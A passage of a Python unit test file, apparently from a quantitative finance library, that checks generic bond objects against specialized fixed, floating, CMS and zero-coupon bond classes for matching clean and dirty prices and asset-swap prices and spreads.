[0.055],[0.025],
inArrears,
100.0, Date(22,August,2005))
cmsSpecializedBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
setCouponPricer(cmsSpecializedBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondTheoValue1 = cmsBond1.cleanPrice()
cmsSpecializedBondTheoValue1 = cmsSpecializedBond1.cleanPrice()
error9 = abs(cmsBondTheoValue1-cmsSpecializedBondTheoValue1)
self.assertFalse(error9>tolerance,
"wrong clean price for cms bond:"
+ "\n generic cms bond's theo clean price: " + str(cmsBondTheoValue1)
+ "\n equivalent specialized bond's theo clean price: " + str(cmsSpecializedBondTheoValue1)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
cmsBondTheoDirty1 = cmsBondTheoValue1+cmsBond1.accruedAmount()
cmsSpecializedBondTheoDirty1 = cmsSpecializedBondTheoValue1+ cmsSpecializedBond1.accruedAmount()
error10 = abs(cmsBondTheoDirty1-cmsSpecializedBondTheoDirty1)
self.assertFalse(error10>tolerance,
"wrong dirty price for cms bond:"
+ "\n generic cms bond's theo dirty price: " + str(cmsBondTheoDirty1)
+ "\n specialized cms bond's theo dirty price: " + str(cmsSpecializedBondTheoDirty1)
+ "\n error: " + str(error10)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondStartDate2 = Date(6,May,2005)
cmsBondMaturityDate2 = Date(6,May,2015)
cmsBondSchedule2 = Schedule(cmsBondStartDate2,
cmsBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg2 = list(CmsLeg([self.faceAmount],cmsBondSchedule2, self.swapIndex,
Thirty360(),Following,[fixingDays],[0.84],[],[],[],inArrears))
cmsbondRedemption2 = bondCalendar.adjust(cmsBondMaturityDate2, Following)
cmsBondLeg2.append(SimpleCashFlow(100.0, cmsbondRedemption2))
## generic bond
cmsBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate2, cmsBondStartDate2, cmsBondLeg2)
cmsBond2.setPricingEngine(bondEngine)
## equivalent specialized cms bond
cmsSpecializedBond2 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule2,
self.swapIndex, Thirty360(),
Following, fixingDays,
[0.84], [0.0],
[], [],
inArrears,
100.0, Date(6,May,2005))
cmsSpecializedBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
setCouponPricer(cmsSpecializedBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondTheoValue2 = cmsBond2.cleanPrice()
cmsSpecializedBondTheoValue2 = cmsSpecializedBond2.cleanPrice()
error11 = abs(cmsBondTheoValue2-cmsSpecializedBondTheoValue2)
self.assertFalse(error11>tolerance,
"wrong clean price for cms bond:"
+ "\n generic cms bond's theo clean price: " + str(cmsBondTheoValue2)
+ "\n cms bond's theo clean price: " + str(cmsSpecializedBondTheoValue2)
+ "\n error: " + str(error11)
+ "\n tolerance: " + str(tolerance))
cmsBondTheoDirty2 = cmsBondTheoValue2+cmsBond2.accruedAmount()
cmsSpecializedBondTheoDirty2 = cmsSpecializedBondTheoValue2+cmsSpecializedBond2.accruedAmount()
error12 = abs(cmsBondTheoDirty2-cmsSpecializedBondTheoDirty2)
self.assertFalse(error12>tolerance,
"wrong dirty price for cms bond:"
+ "\n generic cms bond's dirty price: " + str(cmsBondTheoDirty2)
+ "\n specialized cms bond's theo dirty price: " + str(cmsSpecializedBondTheoDirty2)
+ "\n error: " + str(error12)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBondStartDate1 = Date(19,December,1985)
zeroCpnBondMaturityDate1 = Date(20,December,2015)
zeroCpnBondRedemption1 = bondCalendar.adjust(zeroCpnBondMaturityDate1,
Following)
zeroCpnBondLeg1 = Leg([SimpleCashFlow(100.0, zeroCpnBondRedemption1)])
## generic bond
zeroCpnBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate1, zeroCpnBondStartDate1, zeroCpnBondLeg1)
zeroCpnBond1.setPricingEngine(bondEngine)
## specialized zerocpn bond
zeroCpnSpecializedBond1 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(20,December,2015),
Following,
100.0, Date(19,December,1985))
zeroCpnSpecializedBond1.setPricingEngine(bondEngine)
zeroCpnBondTheoValue1 = zeroCpnBond1.cleanPrice()
zeroCpnSpecializedBondTheoValue1 = zeroCpnSpecializedBond1.cleanPrice()
error13 = abs(zeroCpnBondTheoValue1-zeroCpnSpecializedBondTheoValue1)
self.assertFalse(error13>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n generic zero bond's clean price: " + str(zeroCpnBondTheoValue1)
+ "\n specialized zero bond's clean price: " + str(zeroCpnSpecializedBondTheoValue1)
+ "\n error: " + str(error13)
+ "\n tolerance: " + str(tolerance))
zeroCpnBondTheoDirty1 = zeroCpnBondTheoValue1+ zeroCpnBond1.accruedAmount()
zeroCpnSpecializedBondTheoDirty1 = zeroCpnSpecializedBondTheoValue1+ \
zeroCpnSpecializedBond1.accruedAmount()
error14 = abs(zeroCpnBondTheoDirty1-zeroCpnSpecializedBondTheoDirty1)
self.assertFalse(error14>tolerance,
"wrong dirty price for zero bond:"
+ "\n generic zerocpn bond's dirty price: " + str(zeroCpnBondTheoDirty1)
+ "\n specialized zerocpn bond's clean price: " + str(zeroCpnSpecializedBondTheoDirty1)
+ "\n error: " + str(error14)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBondStartDate2 = Date(17,February,1998)
zeroCpnBondMaturityDate2 = Date(17,February,2028)
zerocpbondRedemption2 = bondCalendar.adjust(zeroCpnBondMaturityDate2,
Following)
zeroCpnBondLeg2 = Leg([SimpleCashFlow(100.0, zerocpbondRedemption2)])
## generic bond
zeroCpnBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate2, zeroCpnBondStartDate2, zeroCpnBondLeg2)
zeroCpnBond2.setPricingEngine(bondEngine)
## specialized zerocpn bond
zeroCpnSpecializedBond2 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(17,February,2028),
Following,
100.0, Date(17,February,1998))
zeroCpnSpecializedBond2.setPricingEngine(bondEngine)
zeroCpnBondTheoValue2 = zeroCpnBond2.cleanPrice()
zeroCpnSpecializedBondTheoValue2 = zeroCpnSpecializedBond2.cleanPrice()
error15 = abs(zeroCpnBondTheoValue2 -zeroCpnSpecializedBondTheoValue2)
self.assertFalse(error15>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n generic zerocpn bond's clean price: " + str(zeroCpnBondTheoValue2)
+ "\n specialized zerocpn bond's clean price: " + str(zeroCpnSpecializedBondTheoValue2)
+ "\n error: " + str(error15)
+ "\n tolerance: " + str(tolerance))
zeroCpnBondTheoDirty2 = zeroCpnBondTheoValue2+ zeroCpnBond2.accruedAmount()
zeroCpnSpecializedBondTheoDirty2 = \
zeroCpnSpecializedBondTheoValue2+ \
zeroCpnSpecializedBond2.accruedAmount()
error16 = abs(zeroCpnBondTheoDirty2-zeroCpnSpecializedBondTheoDirty2)
self.assertFalse(error16>tolerance,
"wrong dirty price for zero coupon bond:"
+ "\n generic zerocpn bond's dirty price: " + str(zeroCpnBondTheoDirty2)
+ "\n specialized zerocpn bond's dirty price: " + str(zeroCpnSpecializedBondTheoDirty2)
+ "\n error: " + str(error16)
+ "\n tolerance: " + str(tolerance))
def testSpecializedBondVsGenericBondUsingAsw(self) :
"""Testing asset-swap prices and spreads for specialized bond against equivalent generic bond..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
payFixedRate = True
parAssetSwap = True
inArrears = False
## Fixed bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondStartDate1 = Date(4,January,2005)
fixedBondMaturityDate1 = Date(4,January,2037)
fixedBondSchedule1 = Schedule(fixedBondStartDate1,
fixedBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg1 = list(FixedRateLeg(fixedBondSchedule1,
ActualActual(ActualActual.ISDA), [self.faceAmount],[0.04]))
fixedbondRedemption1 = bondCalendar.adjust(fixedBondMaturityDate1, Following)
fixedBondLeg1.append(SimpleCashFlow(100.0, fixedbondRedemption1))
## generic bond
fixedBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate1, fixedBondStartDate1, fixedBondLeg1)
bondEngine = DiscountingBondEngine(self.termStructure)
swapEngine = DiscountingSwapEngine(self.termStructure, False)
fixedBond1.setPricingEngine(bondEngine)
## equivalent specialized fixed rate bond
fixedSpecializedBond1 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule1,
[0.04], ActualActual(ActualActual.ISDA), Following,
100.0, Date(4,January,2005))
fixedSpecializedBond1.setPricingEngine(bondEngine)
fixedBondPrice1 = fixedBond1.cleanPrice()
fixedSpecializedBondPrice1 = fixedSpecializedBond1.cleanPrice()
fixedBondAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondPrice1,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap1.setPricingEngine(swapEngine)
fixedSpecializedBondAssetSwap1 = AssetSwap(payFixedRate,
fixedSpecializedBond1,
fixedSpecializedBondPrice1,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedSpecializedBondAssetSwap1.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice1 = fixedBondAssetSwap1.fairCleanPrice()
fixedSpecializedBondAssetSwapPrice1 = fixedSpecializedBondAssetSwap1.fairCleanPrice()
tolerance = 1.0e-13
error1 = abs(fixedBondAssetSwapPrice1-fixedSpecializedBondAssetSwapPrice1)
self.assertFalse(error1>tolerance,
"wrong clean price for fixed bond:"
+ "\n generic fixed rate bond's clean price: " + str(fixedBondAssetSwapPrice1)
+ "\n equivalent specialized bond's clean price: " + str(fixedSpecializedBondAssetSwapPrice1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
fixedBondMktPrice1= 91.832
fixedBondASW1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondASW1.setPricingEngine(swapEngine)
fixedSpecializedBondASW1 = AssetSwap(payFixedRate,
fixedSpecializedBond1,
fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedSpecializedBondASW1.setPricingEngine(swapEngine)
fixedBondASWSpread1 = fixedBondASW1.fairSpread()
fixedSpecializedBondASWSpread1 = fixedSpecializedBondASW1.fairSpread()
error2 = abs(fixedBondASWSpread1-fixedSpecializedBondASWSpread1)
self.assertFalse(error2>tolerance,
"wrong asw spread for fixed bond:"
+ "\n generic fixed rate bond's asw spread: " + str(fixedBondASWSpread1)
+ "\n equivalent specialized bond's asw spread: " + str(fixedSpecializedBondASWSpread1)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
##Fixed bond (Isin: IT0006527060 IBRD 5 02/05/19)
##maturity occurs on a business day
fixedBondStartDate2 = Date(5,February,2005)
fixedBondMaturityDate2 = Date(5,February,2019)
fixedBondSchedule2 = Schedule(fixedBondStartDate2,
fixedBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg2 = list(FixedRateLeg(fixedBondSchedule2, Thirty360(Thirty360.BondBasis),[self.faceAmount],
[0.05]))
fixedbondRedemption2 = bondCalendar.adjust(fixedBondMaturityDate2, Following)
fixedBondLeg2.append(SimpleCashFlow(100.0, fixedbondRedemption2))
## generic bond
fixedBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate2, fixedBondStartDate2, fixedBondLeg2)
fixedBond2.setPricingEngine(bondEngine)
## equivalent specialized fixed rate bond
fixedSpecializedBond2 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule2,
[0.05], Thirty360(Thirty360.BondBasis), Following,
100.0, Date(5,February,2005))
fixedSpecializedBond2.setPricingEngine(bondEngine)
fixedBondPrice2 = fixedBond2.cleanPrice()
fixedSpecializedBondPrice2 = fixedSpecializedBond2.cleanPrice()
fixedBondAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondPrice2,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap2.setPricingEngine(swapEngine)
fixedSpecializedBondAssetSwap2 = AssetSwap(payFixedRate,
fixedSpecializedBond2,
fixedSpecializedBondPrice2,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedSpecializedBondAssetSwap2.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice2 = fixedBondAssetSwap2.fairCleanPrice()
fixedSpecializedBondAssetSwapPrice2 = fixedSpecializedBondAssetSwap2.fairCleanPrice()
error3 = abs(fixedBondAssetSwapPrice2-fixedSpecializedBondAssetSwapPrice2)
self.assertFalse(error3>tolerance,
"wrong clean price for fixed bond:"
+ "\n generic fixed rate bond's clean price: " + str(fixedBondAssetSwapPrice2)
+ "\n equivalent specialized bond's clean price: " + str(fixedSpecializedBondAssetSwapPrice2)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
fixedBondMktPrice2= 102.178
fixedBondASW2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondASW2.setPricingEngine(swapEngine)
fixedSpecializedBondASW2 = AssetSwap(payFixedRate,
fixedSpecializedBond2,
fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedSpecializedBondASW2.setPricingEngine(swapEngine)
fixedBondASWSpread2 = fixedBondASW2.fairSpread()
fixedSpecializedBondASWSpread2 = fixedSpecializedBondASW2.fairSpread()
error4 = abs(fixedBondASWSpread2-fixedSpecializedBondASWSpread2)
self.assertFalse(error4>tolerance,
"wrong asw spread for fixed bond:"
+ "\n generic fixed rate bond's asw spread: " + str(fixedBondASWSpread2)
+ "\n equivalent specialized bond's asw spread: " + str(fixedSpecializedBondASWSpread2)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
##FRN bond (Isin: IT0003543847 ISPIM 0 09/29/13)
##maturity doesn't occur on a business day
floatingBondStartDate1 = Date(29,September,2003)
floatingBondMaturityDate1 = Date(29,September,2013)
floatingBondSchedule1 = Schedule(floatingBondStartDate1,
floatingBondMaturityDate1,
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBondLeg1 = list(IborLeg([self.faceAmount],floatingBondSchedule1, self.iborIndex,
Actual360(), Following,[fixingDays],[],[0.0056],[],[],inArrears))
floatingbondRedemption1 = bondCalendar.adjust(floatingBondMaturityDate1, Following)
floatingBondLeg1.append(SimpleCashFlow(100.0, floatingbondRedemption1))
## generic bond
floatingBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate1, floatingBondStartDate1,
floatingBondLeg1)
floatingBond1.setPricingEngine(bondEngine)
## equivalent specialized floater
floatingSpecializedBond1 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule1,
self.iborIndex, Actual360(),
Following, fixingDays,
[1],
[0.0056],
[], [],
inArrears,
100.0, Date(29,September,2003))
floatingSpecializedBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
setCouponPricer(floatingSpecializedBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondPrice1 = floatingBond1.cleanPrice()
floatingSpecializedBondPrice1= floatingSpecializedBond1.cleanPrice()
floatingBondAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondPrice1,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap1.setPricingEngine(swapEngine)
floatingSpecializedBondAssetSwap1 = AssetSwap(payFixedRate,
floatingSpecializedBond1,
floatingSpecializedBondPrice1,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingSpecializedBondAssetSwap1.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice1 = floatingBondAssetSwap1.fairCleanPrice()
floatingSpecializedBondAssetSwapPrice1 = floatingSpecializedBondAssetSwap1.fairCleanPrice()
error5 = abs(floatingBondAssetSwapPrice1-floatingSpecializedBondAssetSwapPrice1)
self.assertFalse(error5>tolerance,
"wrong clean price for frnbond:"
+ "\n generic frn rate bond's clean price: " + str(floatingBondAssetSwapPrice1)
+ "\n equivalent specialized bond's price: " + str(floatingSpecializedBondAssetSwapPrice1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
floatingBondMktPrice1= 101.33
floatingBondASW1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondASW1.setPricingEngine(swapEngine)
floatingSpecializedBondASW1 = AssetSwap(payFixedRate,
floatingSpecializedBond1,
floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingSpecializedBondASW1.setPricingEngine(swapEngine)
floatingBondASWSpread1 = floatingBondASW1.fairSpread()
floatingSpecializedBondASWSpread1 = floatingSpecializedBondASW1.fairSpread()
error6 = abs(floatingBondASWSpread1-floatingSpecializedBondASWSpread1)
self.assertFalse(error6>tolerance,
"wrong asw spread for fixed bond:"
+ "\n generic frn rate bond's asw spread: " + str(floatingBondASWSpread1)
+ "\n equivalent specialized bond's asw spread: " + str(floatingSpecializedBondASWSpread1)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
##FRN bond (Isin: XS0090566539 COE 0 09/24/18)
##maturity occurs on a business day
floatingBondStartDate2 = Date(24,September,2004)
floatingBondMaturityDate2 = Date(24,September,2018)
floatingBondSchedule2 = Schedule(floatingBondStartDate2,
floatingBondMaturityDate2,
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBondLeg2 = list(IborLeg([self.faceAmount],floatingBondSchedule2, self.iborIndex,
Actual360(),ModifiedFollowing,[fixingDays],[],[0.0025],[],[],inArrears))
floatingbondRedemption2 = bondCalendar.adjust(floatingBondMaturityDate2, ModifiedFollowing)
floatingBondLeg2.append(SimpleCashFlow(100.0, floatingbondRedemption2))
## generic bond
floatingBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate2, floatingBondStartDate2,
floatingBondLeg2)
floatingBond2.setPricingEngine(bondEngine)
## equivalent specialized floater
floatingSpecializedBond2 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule2,
self.iborIndex, Actual360(),
ModifiedFollowing, fixingDays,
[1],
[0.0025],
[], [],
inArrears,
100.0, Date(24,September,2004))
floatingSpecializedBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
setCouponPricer(floatingSpecializedBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
floatingBondPrice2 = floatingBond2.cleanPrice()
floatingSpecializedBondPrice2= floatingSpecializedBond2.cleanPrice()
floatingBondAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondPrice2,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap2.setPricingEngine(swapEngine)
floatingSpecializedBondAssetSwap2 = AssetSwap(payFixedRate,
floatingSpecializedBond2,
floatingSpecializedBondPrice2,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingSpecializedBondAssetSwap2.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice2 = floatingBondAssetSwap2.fairCleanPrice()
floatingSpecializedBondAssetSwapPrice2 = floatingSpecializedBondAssetSwap2.fairCleanPrice()
error7 = abs(floatingBondAssetSwapPrice2-floatingSpecializedBondAssetSwapPrice2)
self.assertFalse(error7>tolerance,
"wrong clean price for frnbond:"
+ "\n generic frn rate bond's clean price: " + str(floatingBondAssetSwapPrice2)
+ "\n equivalent specialized frn bond's price: " + str(floatingSpecializedBondAssetSwapPrice2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
floatingBondMktPrice2 = 101.26
floatingBondASW2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondASW2.setPricingEngine(swapEngine)
floatingSpecializedBondASW2 = AssetSwap(payFixedRate,
floatingSpecializedBond2,
floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingSpecializedBondASW2.setPricingEngine(swapEngine)
floatingBondASWSpread2 = floatingBondASW2.fairSpread()
floatingSpecializedBondASWSpread2 = floatingSpecializedBondASW2.fairSpread()
error8 = abs(floatingBondASWSpread2-floatingSpecializedBondASWSpread2)
self.assertFalse(error8>tolerance,
"wrong asw spread for frn bond:"
+ "\n generic frn rate bond's asw spread: " + str(floatingBondASWSpread2)
+ "\n equivalent specialized bond's asw spread: " + str(floatingSpecializedBondASWSpread2)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
## CMS bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondStartDate1 = Date(22,August,2005)
cmsBondMaturityDate1 = Date(22,August,2020)
cmsBondSchedule1 = Schedule(cmsBondStartDate1,
cmsBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg1 = list(CmsLeg([self.faceAmount],cmsBondSchedule1, self.swapIndex,
Thirty360(),Following,[fixingDays], [],[],[0.055],[0.025],inArrears))
cmsbondRedemption1 = bondCalendar.adjust(cmsBondMaturityDate1,Following)
cmsBondLeg1.append(SimpleCashFlow(100.0, cmsbondRedemption1))
## generic cms bond
cmsBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate1, cmsBondStartDate1, cmsBondLeg1)
cmsBond1.setPricingEngine(bondEngine)
## equivalent specialized cms bond
cmsSpecializedBond1 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule1,
self.swapIndex, Thirty360(),
Following, fixingDays,
[1.0], [0.0],
[0.055], [0.025],
inArrears,
100.0, Date(22,August,2005))
cmsSpecializedBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
setCouponPricer(cmsSpecializedBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondPrice1 = cmsBond1.cleanPrice()
cmsSpecializedBondPrice1 = cmsSpecializedBond1.cleanPrice()
cmsBondAssetSwap1 = AssetSwap(payFixedRate,cmsBond1, cmsBondPrice1,
self.iborIndex, self.nonnullspread,
Schedule(),self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap1.setPricingEngine(swapEngine)
cmsSpecializedBondAssetSwap1 = AssetSwap(payFixedRate,cmsSpecializedBond1,
cmsSpecializedBondPrice1,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsSpecializedBondAssetSwap1.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice1 = cmsBondAssetSwap1.fairCleanPrice()
cmsSpecializedBondAssetSwapPrice1 = cmsSpecializedBondAssetSwap1.fairCleanPrice()
error9 = abs(cmsBondAssetSwapPrice1-cmsSpecializedBondAssetSwapPrice1)
self.assertFalse(error9>tolerance,
"wrong clean price for cmsbond:"
+ "\n generic bond's clean price: " + str(cmsBondAssetSwapPrice1)
+ "\n equivalent specialized cms rate bond's price: " + str(cmsSpecializedBondAssetSwapPrice1)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
cmsBondMktPrice1 = 87.02## market executable price as of 4th sept 2007
cmsBondASW1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondASW1.setPricingEngine(swapEngine)
cmsSpecializedBondASW1 = AssetSwap(payFixedRate,
cmsSpecializedBond1,
cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsSpecializedBondASW1.setPricingEngine(swapEngine)
cmsBondASWSpread1 = cmsBondASW1.fairSpread()
cmsSpecializedBondASWSpread1 = cmsSpecializedBondASW1.fairSpread()
error10 = abs(cmsBondASWSpread1-cmsSpecializedBondASWSpread1)
self.assertFalse(error10>tolerance,
"wrong asw spread for cm bond:"
+ "\n generic cms rate bond's asw spread: " + str(cmsBondASWSpread1)
+ "\n equivalent specialized bond's asw spread: " + str(cmsSpecializedBondASWSpread1)
+ "\n error: " + str(error10)
+ "\n tolerance: " + str(tolerance))
##CMS bond (Isin: XS0218766664 ISPIM 0 5/6/15)
##maturity occurs on a business day
cmsBondStartDate2 = Date(6,May,2005)
cmsBondMaturityDate2 = Date(6,May,2015)
cmsBondSchedule2 = Schedule(cmsBondStartDate2,
cmsBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg2 = list(CmsLeg([self.faceAmount],cmsBondSchedule2, self.swapIndex,
Thirty360(), Following, [fixingDays] , [0.84],[],[],[],inArrears))
cmsbondRedemption2 = bondCalendar.adjust(cmsBondMaturityDate2,
Following)
cmsBondLeg2.append(SimpleCashFlow(100.0, cmsbondRedemption2))
## generic bond
cmsBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate2, cmsBondStartDate2, cmsBondLeg2)
cmsBond2.setPricingEngine(bondEngine)
## equivalent specialized cms bond
cmsSpecializedBond2 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule2,
self.swapIndex, Thirty360(),
Following, fixingDays,
[0.84], [0.0],
[], [],
inArrears,
100.0, Date(6,May,2005))
cmsSpecializedBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
setCouponPricer(cmsSpecializedBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondPrice2 = cmsBond2.cleanPrice()
cmsSpecializedBondPrice2 = cmsSpecializedBond2.cleanPrice()
cmsBondAssetSwap2 = AssetSwap(payFixedRate,cmsBond2, cmsBondPrice2,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap2.setPricingEngine(swapEngine)
cmsSpecializedBondAssetSwap2 = AssetSwap(payFixedRate,cmsSpecializedBond2,
cmsSpecializedBondPrice2,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsSpecializedBondAssetSwap2.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice2 = cmsBondAssetSwap2.fairCleanPrice()
cmsSpecializedBondAssetSwapPrice2 = cmsSpecializedBondAssetSwap2.fairCleanPrice()
error11 = abs(cmsBondAssetSwapPrice2-cmsSpecializedBondAssetSwapPrice2)
self.assertFalse(error11>tolerance,
"wrong clean price for cmsbond:"
+ "\n generic bond's clean price: " + str(cmsBondAssetSwapPrice2)
+ "\n equivalent specialized cms rate bond's price: " + str(cmsSpecializedBondAssetSwapPrice2)
+ "\n error: " + str(error11)
+ "\n tolerance: " + str(tolerance))
cmsBondMktPrice2 = 94.35## market executable price as of 4th sept 2007
cmsBondASW2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondASW2.setPricingEngine(swapEngine)
cmsSpecializedBondASW2 = AssetSwap(payFixedRate,
cmsSpecializedBond2,
cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsSpecializedBondASW2.setPricingEngine(swapEngine)
cmsBondASWSpread2 = cmsBondASW2.fairSpread()
cmsSpecializedBondASWSpread2 = cmsSpecializedBondASW2.fairSpread()
error12 = abs(cmsBondASWSpread2-cmsSpecializedBondASWSpread2)
self.assertFalse(error12>tolerance,
"wrong asw spread for cm bond:"
+ "\n generic cms rate bond's asw spread: " + str(cmsBondASWSpread2)
+ "\n equivalent specialized bond's asw spread: " + str(cmsSpecializedBondASWSpread2)
+ "\n error: " + str(error12)
+ "\n tolerance: " + str(tolerance))
## Zero-Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBondStartDate1 = Date(19,December,1985)
